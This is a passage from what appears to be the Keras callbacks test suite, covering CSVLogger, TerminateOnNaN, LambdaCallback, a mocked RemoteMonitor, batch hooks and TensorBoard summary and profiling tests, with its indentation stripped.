dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# On Windows, \r\n line endings can make csv.reader yield an empty row
# after each line, so skip empty rows.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary thread that should run during model
# training and be unblocked (and joined) after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1)  # a length-1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_epoch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
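# For example (illustrative values only), an epoch-level loss written to the
# train run would be recorded as:
#   _ObservedSummary(logdir='/tmp/logs/train', tag='epoch_loss')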
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains a summary of an unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Check for V2 scalar summaries, which have a different PB
# structure.
if event.summary.value[
0].metadata.plugin_data.plugin_name == 'scalars':
container = result.scalars
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.logdir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
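# The TensorFlow profiler writes traces as gzipped JSON files under
# <logdir>/plugins/profile/..., so counting '*.trace.json.gz' files gives the
# number of profiling sessions that were recorded.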
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
